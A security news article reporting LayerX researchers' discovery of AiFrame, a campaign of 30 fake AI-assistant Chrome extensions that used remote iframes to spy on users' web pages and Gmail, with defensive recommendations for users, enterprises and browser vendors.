Somebody Is Watching: AI Weaponizes Fake Chrome Extensions to Spy on Users

Chrome extensions LayerX

The promise of productivity has turned AI tools into effective lures for cybercriminals.

Researchers at LayerX Security recently exposed AiFrame, a coordinated campaign of 30 malicious Chrome browser extensions that impersonated well-known AI assistants in February of 2025. These included ChatGPT, Claude, Gemini, and Grok.

More than 260K users installed the extensions, even after some extensions earned Google's coveted Featured Snippet designation. Appearing at the top of search result pages, these extensions seemed to offer AI summarization, writing assistance, and Gmail integration. In reality, they functioned as covert surveillance platforms.

“The campaign exploits the conversational nature of AI interactions, which has conditioned users to share detailed information,” said Natalie Zargarov, a LayerX researcher. “By injecting iframes that mimic trusted AI interfaces, they've created a nearly invisible man-in-the-middle attack that intercepts everything from API keys to personal data before it ever reaches the legitimate service."

An Invisible Layer of Third-Party Control

Within the AiFrame campaign, rather than processing data locally, each extension rendered a full-screen browser iframe (inline frame). iframe HTML elements then embed an independent web page, document, or media (videos, maps, ads) inside a current web page.

Since remote servers used by attackers controlled the iframes, this placed an invisible layer of third-party control over every website an affected user visited.

From there, the architecture allowed operators to extract readable page content, harvest entire Gmail threads and drafts, activate voice recognition, and collect behavioral telemetry—without triggering a Chrome Web Store update or review.

A Trojan Horse in Your Toolbar

This campaign reveals a disturbing structural weakness in how browser-extension marketplaces vet and monitor tools that delegate their core functionality to remote infrastructure. The campaign also raises urgent questions about whether current extension security models can keep pace with the AI gold rush.

Consider this commonplace scenario:

You install a <Featured Snippet> AI sidebar extension to boost productivity. You are unaware that it is silently reading every email and webpage you open.

Jumping on the AI hype cycle, you have inadvertently created a dangerous new attack surface in your browser. And your security defenses can’t keep up.

Pretty scary, right?

The Anatomy of the AiFrame Campaign

LayerX Security researchers discovered the AiFrame campaign through a combination of AI-driven browser extension detection and code similarity analysis. The extension spraying strategy spanned the 30 extensions with different names, branding, and IDs.

However, they had identical codebases. Each codebase communicated with subdomains of tapnetic[.]pro. To exploit brand trust, the extension followed an impersonation playbook that mimicked ChatGPT, Claude, Gemini, Grok, and DeepSeek.

Here’s a rundown of the malicious extensions posing as popular AI assistants and tools with the most installs:

  • Gemini AI Sidebar - 80,000
  • AI Assistant - 50,000
  • AI Sidebar - 50,000
  • ChatGPT Translate - 30,000
  • AI GPT - 20,000
  • AI Sidebar - 9,000
  • Google Gemini - 7,000
  • ChatGPT - 1,000
  • DeepSeek Chat - 1,000
  • ChatGPT Translation - 1,000
  • ChatGPT for Gmail - 1,000

Instead of running AI logic locally, the extensions rendered a full-screen iframe from a remote, attacker-controlled domain. This enabled real-time changes to functionality, the silent deployment of new data-harvesting capabilities, and complete invisibility to install-time code review.

On top of that, the page content extraction mechanism used the Mozilla readability library to scrape structured representations of any webpage a user visits. This included authenticated and internal pages. The extraction mechanism also had voice recognition capability: It could remotely trigger speech-to-text via the Web Speech API, with transcripts returned to cybercriminals.

The Gmail Espionage Module

As a high-value cyber target, Gmail can include corporate communications, financial information, authentication tokens, and personal correspondence. In this campaign, attackers injected the dedicated content script at &lt;document_start&gt; on mail.google.com across 15 of the 30 extensions.

From there, the script manipulated the Document Object Model programming interface for HTML and XML. This allowed threat actors to extract email thread text and draft content. They also composed window data to create, structure, and manage recipient addresses, subject lines, and body text within emails.

At the social engineering layer, cybercriminals exfiltrated email content when users invoked seemingly helpful features, such as AI-powered summaries, auto replies, and translation. This all adds up to victims becoming active participants in their own surveillance.

Evading Detection—A Game of Whack-a-Mole

The campaign went through a removal and re-upload cycle resembling a Whack-a-Mole game. For example, Google removed AiForce from the Gemini AI Sidebar on February 6 last year. Just two weeks later, an identical byte-for-byte clone was uploaded under a new ID.

Adding to the challenge, extension spraying makes takedowns ineffective. With 30 extensions, removing one barely dents the campaign.

And because Google applied its Featured Snippet—sending a trust signal for a malicious extension, the browser giant essentially undermined user vigilance. Furthermore, by implementing telemetry and tracking pixels, cybercriminals could monitor install and uninstall rates to optimize distribution.

Store Reviews Not Enough

To put this campaign into context, AiFrame joins a growing roster of extension campaigns (such as GhostPoster and the 16-extension ChatGPT credential theft) that exploited the same structural blind spot. Unfortunately, static code analysis for extension vetting is limited by high false-positive rates.

This can cause alert fatigue, an inability to detect run-time-only issues, and poor comprehension of attacker intent. Static tools also often miss complex logic flaws, struggle with large codebases, and require extensive manual tuning.

Plus, because of the gap between install-time review and run-time behavior, when an extension's functionality is served by a remote server, the reviewed code is essentially a hollow shell. This approach differs from traditional malware in that there are no malicious payloads in the extension package itself. All dangerous behavior originates from the iframe.

The Path Forward—Recommendations and Defenses

Campaigns like AiFrame create a trust crisis. They erode confidence in the entire AI extension ecosystem, potentially slowing legitimate innovation. It’s critical for enterprises and end-users to conduct immediate risk assessments of their browsers by checking if any of the 30 identified extensions are installed.

Here are a few additional recommendations:

  • Individual users: audit installed extensions, scrutinize permissions, and use AI-provider apps rather than third-party wrappers.
  • Enterprises: deploy behavior-based extension monitoring, enforce allowlists, and strengthen run-time (not just install-time) enforcement.
  • Browser vendors: conduct runtime behavior monitoring and stricter reviews of extensions that load remote iframes while also enacting faster responses to re-upload evasion tactics.
  • Security teams: proactively hunt for threats in extension ecosystems as AI adoption accelerates.

Affected users should also consider their Gmail communications fully compromised and reset their passwords. And beware of the enterprise exposure. Employees installing unvetted AI extensions on corporate browsers basically create shadow AI that bypasses IT controls.

The Cost of Convenience

The AI extension boom will not slow down; neither will the attackers exploiting AI.

“What is new and concerning is how it’s being applied,” said Zargarov. “Attackers are now impersonating artificial intelligence interfaces and developer tools, places where users are conditioned to paste sensitive data without hesitation.”

As Zargarov’s observation points out, security teams and end-users need to realize that the promise of the AI productivity boost also brings the threat of surveillance tools. In the race to integrate AI into every corner of the browser, the browser industry must ensure that trust is not the price of convenience.

Author
  • Contributing Writer, Security Buzz
    After majoring in journalism at Northeastern University and working for <i>The Boston Globe</i>, Jeff Pike has collaborated with technical experts in the IT industry for more than 30 years. His technology expertise ranges from cybersecurity to networking, the cloud, and user productivity. Major industry players Jeff has written for include Microsoft, Cisco, Dell, AWS, and Google.